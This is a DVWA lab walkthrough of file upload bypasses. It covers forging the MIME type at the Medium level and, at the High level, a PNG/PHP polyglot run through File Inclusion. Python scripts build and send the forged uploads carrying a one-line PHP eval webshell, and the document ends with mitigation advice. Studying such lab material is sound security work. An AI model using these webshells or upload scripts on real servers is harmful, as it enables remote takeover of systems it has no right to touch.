File Upload Vulnerability
If the server-side script does not strictly validate uploaded files, a user can upload a webshell, malware or other malicious script and thereby gain control of the server. The two DVWA levels below show the checks that are commonly relied on (the client-declared MIME type; the extension plus getimagesize()) and why neither is sufficient on its own.
Medium
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Only act when the form's Upload button was submitted.
    // Where the file will be written: hackable/uploads/ plus the client-supplied file name
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information, all taken from the multipart request
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; // file name
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; // MIME type as declared by the client
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // file size in bytes

    // Is the declared type image/jpeg or image/png, and is the size under 100 000 bytes?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Try to move the file from PHP's temporary location to the upload directory
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Key functions
move_uploaded_file: moves a file that arrived via an HTTP POST upload from PHP's temporary location to a new path, here the upload directory; it returns false if the move fails or if the source is not a file PHP received as an upload. In the code above the result is negated with "!", so the first branch is the failure case:
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    // the move failed: upload failed
    echo '<pre>Your image was not uploaded.</pre>';
}
else {
    // the move succeeded: upload succeeded, and the stored path is echoed back
    echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
$_FILES['uploaded']['type']: the MIME type the client wrote into the Content-Type header of its own multipart part. PHP copies it into $_FILES without comparing it against the file's contents, so this is the only check the Medium level makes on what the file is, and it is entirely under the uploader's control.
Bypass
1. Write a one-line PHP webshell into a .php file and submit it through the upload form.
2. Intercept the upload request in Burp Suite, change the file part's Content-Type header to image/png, and forward the request.
3. The upload succeeds and the server echoes the stored path under hackable/uploads/.
4. AntSword connects successfully, using that path as the URL and the webshell's POST parameter name as the password.
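To make concrete what the Content-Type edit in Burp changes, here is an added Python example (not DVWA's code and not part of the original write-up). It builds the multipart body the upload form sends, extracts what PHP would put into $_FILES['uploaded'], and evaluates the Medium-level condition over it; the same file bytes are rejected with an honest type and accepted once the client relabels them. The webshell's parameter name cmd, the boundary string, the DVWA URL and the cookie value are assumptions, and the upload() helper is only for use against a lab instance you own.

```python
import re
import urllib.request
from typing import NamedTuple, Tuple

# One-line PHP webshell of the kind the write-up uploads. The POST parameter
# name "cmd" is an assumption; it is the password entered in AntSword later.
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"

# Arbitrary multipart boundary (assumption; a browser picks its own).
BOUNDARY = "----dvwa-upload-example"


class FilePart(NamedTuple):
    name: str   # $_FILES['uploaded']['name']
    type: str   # $_FILES['uploaded']['type'], copied from the client's header
    size: int   # $_FILES['uploaded']['size']


def build_multipart(filename: str, content_type: str, data: bytes) -> Tuple[str, bytes]:
    """Build the multipart/form-data body DVWA's upload form sends. The file
    part's Content-Type is written by the client; editing it in Burp is all
    the Medium bypass does."""
    b = BOUNDARY.encode()
    lines = [
        b"--" + b,
        b'Content-Disposition: form-data; name="uploaded"; filename="' + filename.encode() + b'"',
        b"Content-Type: " + content_type.encode(),
        b"",
        data,
        b"--" + b,
        b'Content-Disposition: form-data; name="Upload"',
        b"",
        b"Upload",
        b"--" + b + b"--",
        b"",
    ]
    return "multipart/form-data; boundary=" + BOUNDARY, b"\r\n".join(lines)


_PART = re.compile(
    rb'name="uploaded"; filename="([^"]*)"\r\nContent-Type: ([^\r\n]+)\r\n\r\n(.*?)\r\n--',
    re.S,
)


def parse_file_part(body: bytes) -> FilePart:
    """What the server sees: how PHP fills $_FILES['uploaded'] from the request.
    Nothing here looks at the file's bytes, only at what the client declared."""
    m = _PART.search(body)
    if m is None:
        raise ValueError("no 'uploaded' part in body")
    return FilePart(m.group(1).decode(), m.group(2).decode(), len(m.group(3)))


def medium_check(part: FilePart) -> bool:
    """Port of the Medium-level PHP condition: declared type and size only."""
    return part.type in ("image/jpeg", "image/png") and part.size < 100000


def upload(url: str, cookie: str, filename: str, content_type: str, data: bytes) -> bytes:
    """Send the forged upload to a running DVWA (not exercised offline). DVWA
    only serves the page to a logged-in session, so the cookie must carry
    PHPSESSID and security=medium."""
    ctype, body = build_multipart(filename, content_type, data)
    req = urllib.request.Request(
        url, data=body, method="POST", headers={"Content-Type": ctype, "Cookie": cookie}
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read()


if __name__ == "__main__":
    # As a browser sends it: a non-image Content-Type, rejected by the server.
    _, honest = build_multipart("shell.php", "application/octet-stream", WEBSHELL)
    print("honest request passes:", medium_check(parse_file_part(honest)))
    # After editing in Burp: identical file bytes, Content-Type relabelled image/png.
    _, forged = build_multipart("shell.php", "image/png", WEBSHELL)
    print("forged request passes:", medium_check(parse_file_part(forged)))
    # Against a live lab instance (URL and cookie are assumptions):
    # upload("http://127.0.0.1/DVWA/vulnerabilities/upload/",
    #        "PHPSESSID=...; security=medium", "shell.php", "image/png", WEBSHELL)
```

Note that parse_file_part() never opens the data: the file name keeps its .php extension and the bytes are PHP source, yet the check passes. That is why a MIME-type check on $_FILES['type'] filters only honest browsers.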
High
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where the file will be written: hackable/uploads/ plus the client-supplied file name
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information from $_FILES
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];                                   // file name
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);      // extension after the last dot
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];                                   // file size in bytes
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];                               // PHP's temporary file

    // Is the extension jpg/jpeg/png, is the size under 100 000 bytes, and does getimagesize() see an image header?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Try to move the file from the temporary location to the upload directory
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Extension, size or image check failed
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Key functions
strrpos: returns the position of the last occurrence of a substring within a string (positions start at 0, not 1); here, the position of the last "." in the file name.
substr: returns the part of a string starting at a given offset (and, optionally, of a given length); combined with strrpos it extracts the extension after the last dot, which is then lower-cased and compared against jpg, jpeg and png.
getimagesize: reads the image header and returns the dimensions and type, or false if no image header is recognised. It inspects only the header, so a file that begins with a valid image and has PHP code appended still passes, which is what the bypass below relies on.
Bypass
1. Concatenate an ordinary image and the PHP script (copy /b on Windows) into a single file with an image extension: a valid image with the webshell appended.
2. The file uploads successfully, since the extension, size and getimagesize() checks all pass.
3. Because the file keeps its image extension, the web server will not run it as PHP on its own; use the File Inclusion vulnerability to execute it: paste the uploaded image's path into the file inclusion parameter and open it. The response shows the image's raw bytes as garbled text, which means the include worked and the appended PHP ran.
4. Open AntSword and add the file inclusion URL and the webshell's password.
5. Paste the page's cookie (the PHPSESSID and security values) into the request headers under AntSword's request settings, since DVWA only serves the page to a logged-in session.
6. The connection then succeeds.
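As an added example (not DVWA's code and not from the original write-up) for the polyglot construction and the checks it has to pass, the Python below builds a small valid PNG, appends the webshell exactly as copy /b would, ports the High-level condition, including a PNG-only stand-in for getimagesize() that, like the real function, decides from the header alone, and builds the File Inclusion URL used in the final steps. It also shows the two single-trick attempts the level does block (a bare .php, and a .php merely renamed to .png). The webshell parameter name cmd, the DVWA base URL and the relative path from vulnerabilities/fi/ to hackable/uploads/ are assumptions about a default DVWA install.

```python
import struct
import zlib
from typing import Optional, Tuple

# One-line PHP webshell appended to the image; "cmd" is an assumption and is
# the password later entered in AntSword.
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length, type, data, CRC32 over type+data, as the PNG format requires."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png(width: int = 1, height: int = 1) -> bytes:
    """A constructed, valid 8-bit RGB PNG (solid red), standing in for the
    'ordinary image' the write-up starts from."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanlines)) + png_chunk(b"IEND", b""))


def make_polyglot(image: bytes, php: bytes) -> bytes:
    """Same result as `copy /b pic.png + shell.php shell.png` on Windows or
    `cat pic.png shell.php > shell.png`: image first, PHP appended after IEND."""
    return image + php


def getimagesize_png(data: bytes) -> Optional[Tuple[int, int]]:
    """Stand-in for PHP getimagesize() restricted to PNG: it reads the signature
    and IHDR and never looks past the header, so trailing bytes (our PHP) do not
    make it fail. Returns (width, height) or None."""
    if not data.startswith(PNG_SIGNATURE) or len(data) < 24 or data[12:16] != b"IHDR":
        return None
    width, height = struct.unpack(">II", data[16:24])
    return width, height


def high_check(filename: str, data: bytes) -> bool:
    """Port of the High-level PHP condition: extension (strrpos + substr),
    size, and getimagesize()."""
    ext = filename[filename.rfind(".") + 1:].lower()
    return (ext in ("jpg", "jpeg", "png") and len(data) < 100000
            and getimagesize_png(data) is not None)


def inclusion_url(base: str, uploaded_name: str) -> str:
    """URL for DVWA's File Inclusion page that makes PHP include the polyglot and
    so execute the appended code. The relative path assumes DVWA's default
    layout (vulnerabilities/fi/ beside hackable/uploads/); base is an assumption."""
    return f"{base}/vulnerabilities/fi/?page=../../hackable/uploads/{uploaded_name}"


if __name__ == "__main__":
    shell = make_polyglot(minimal_png(), WEBSHELL)
    print("bare .php rejected (extension):      ", not high_check("shell.php", WEBSHELL))
    print("renamed .png rejected (getimagesize):", not high_check("shell.png", WEBSHELL))
    print("polyglot .png accepted:              ", high_check("shell.png", shell))
    with open("shell.png", "wb") as f:
        f.write(shell)
    # Upload shell.png through the form, then point AntSword at this URL with the
    # password "cmd", adding the browser's Cookie header (PHPSESSID and
    # security=high) in AntSword's request settings:
    print(inclusion_url("http://127.0.0.1/DVWA", "shell.png"))
```

The polyglot passes because each of the three checks answers a different question (what is the name, how big is it, does it start like an image) and none of them asks whether the file contains PHP. Storing uploads under a server-generated name, re-encoding images rather than copying their bytes, and serving the upload directory without PHP execution are what close the gap; the File Inclusion step only matters because the stored file keeps the attacker's content intact.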